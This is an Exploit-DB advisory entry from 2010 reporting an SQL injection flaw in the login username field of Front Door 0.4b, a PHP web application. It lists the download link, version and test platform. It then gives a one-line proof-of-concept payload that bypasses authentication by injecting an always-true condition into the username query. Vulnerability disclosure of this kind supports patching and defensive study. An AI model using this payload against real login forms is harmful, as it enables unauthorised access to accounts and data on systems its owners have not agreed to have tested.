Front Door 0.4b - SQL Injection Vulnerability

2010-03-14T00:00:00
ID EDB-ID:11727
Type exploitdb
Reporter blake
Modified 2010-03-14T00:00:00

Description

Front Door v0.4b SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            # Software Link: http://sourceforge.net/projects/frontdoor/files/Front%20Door%20-%20BETA/Front%20Door%20-%20v0.4b/frontdoor-v0.4b.rar/download
# Version: 0.4b
# Tested on: Windows XP SP3 with MySQL


Login user name field is vulnerable to sql injection.
POC:
' OR username IS NOT NULL OR username = '